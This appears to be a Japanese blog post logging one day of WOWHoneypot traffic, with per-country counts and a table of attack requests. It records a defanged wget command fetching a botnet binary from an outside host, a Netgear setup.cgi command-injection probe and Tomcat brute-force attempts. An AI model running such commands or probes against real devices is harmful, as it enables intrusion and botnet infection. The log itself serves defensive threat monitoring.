WOWHoneypot観察(167日目)
2019/08/30(金)
トータルは654件でした。
ハンティングログは以下です。
211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
IPのロケーション別の件数は以下です。
スイス | 405 |
中国 | 197 |
アメリカ | 10 |
イギリス | 5 |
フランス | 3 |
ブラジル | 3 |
イタリア | 3 |
インドネシア | 2 |
韓国 | 2 |
香港 | 2 |
シンガポール | 2 |
スペイン | 2 |
ポーランド | 2 |
ウクライナ | 2 |
トルコ | 2 |
ギリシャ | 1 |
エストニア | 1 |
ナイジェリア | 1 |
グルジア | 1 |
ロシア | 1 |
エクアドル | 1 |
イラン | 1 |
モロッコ | 1 |
チェコ | 1 |
オランダ | 1 |
アルゼンチン | 1 |
インド | 1 |
件数 | 概要 | リクエスト |
---|---|---|
596 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
39 | アクセス | GET / |
5 | WordPressの調査 | GET /wp-admin/ |
3 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | 不正中継の調査 | HEAD hxxp[:]//123.125.114[.]144/ |
1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | 不正中継の調査 | GET hxxp[:]//www[.]ip[.]cn/ |
1 | 不正中継の調査 | GET hxxp[:]//www[.]123cha[.]com/ |
1 | 不正中継の調査 | GET hxxp[:]//httpheader[.]net/ |
1 | 不正中継の調査 | GET hxxp[:]//boxun[.]com/ |
1 | DGN1000 Netgear ルータの調査 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
1 | WebShell設置の調査? | GET /agentui.php/ |
1 | 不正中継の試み | CONNECT www[.]baidu[.]com:443 |
1 | 不正中継の試み | CONNECT cn[.]bing[.]com:443 |